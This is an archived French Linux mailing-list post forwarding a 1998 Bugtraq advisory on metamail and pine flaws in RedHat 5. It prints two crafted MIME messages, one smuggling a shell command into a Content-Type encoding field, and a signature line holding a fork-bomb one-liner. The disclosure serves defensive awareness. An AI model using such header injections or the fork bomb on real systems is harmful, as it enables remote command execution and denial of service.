[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[linux-team] Trou de secu avec lecteur mail



Allez jeter un coup d'oeil a :

http://www.insecure.org/sploits/redhat.metamail.html


Le texte en vrac :
-------------------------------------------------------------------
 
                                                       Last modified:
Saturday, 24-Apr-1999 21:31:28 PDT

                    


                           RedHat 5 metamail hole

                                            Summary

 Description:
                   Many mail clients, MTA's, etc. are poorly written and
can interpret mail in ways that lead to security
                   wholes. One of the bugs in this message demonstrates a
way to execute arbitrary commands by
                   sending mail to a Redhat 5 user. The bug is in metamail
script processing of MIME messages.
 Author:
                   Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
 Compromise:
                   potential root (remote). The victim must read the mail
with Pine (or something else that calls
                   metamail).
 Vulnerable Systems:
                   RedHat 5, other linux boxes with vulnerable metamail
script.
 Date:
                   5 April 1998

                                             Details



Date: Sun, 5 Apr 1998 15:25:25 +0200
From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: mailrc and pine security holes

Many of mailcap-compatible unix mail clients have several security holes.
Mailcap mechanism is usually so poorly implemented that it's possible
to perform wida range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via e-mail message.

Here are examples, both tested under Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):


========================================
Example 1 (light) - pine 3.96 confusion
=======================================

Following example demostrates how to cause a few 'mostly harmless'
errors due to the improper expansion of ` character by pine - it's
just annoying, because you can't view this mail properly, but I
have no idea if it's exploitable:

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: text/plain;
        charset="crashme`"
Content-Transfer-Encoding: quoted-printable

Hellow!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ***


===============================================
Example 2 (heavy) - execution of arbitrary code
===============================================

That's something even more dangerous - following MIME mail, when viewed,
executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script):

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
        encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
Content-Transfer-Encoding: quoted-printable

Hellow!!!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ****

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]



                                          More Exploits!


The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
 All OS's
                   Linux
                            Solaris/SunOS
                                        Micro$oft
 *BSD
                   Macintosh
                            AIX
                                        IRIX
 ULTRIX/Digital UNIX
                   HP/UX
                            SCO
                                        Remote exploits


This page is part of Fyodor's exploit world. Please do not steal it. For a
free program to automate scanning your network for
vulnerable hosts and services, check out my network mapping tool, nmap. 

-------------------------------------------------------------------

A+
 Yo




/----------------------------/
/         M. MASSE           /
/     masse@meon-com.fr      /
/   Mobile 06 60 53 39 94    /
/     Fax 06 61 66 00 14     /
/     Meon Communication     /
/   Comores - Anjouan 88     /
/      521, ch du Puy        /
/      06600 ANTIBES         /
/         FRANCE             /
/----------------------------/
---------
Visit the Linux Supertore Online: http://www.redcorp.com !
If you want to be deleted from the list, send a mail to
majordomo@rtfm.be with "unsubscribe linux-team" in the body.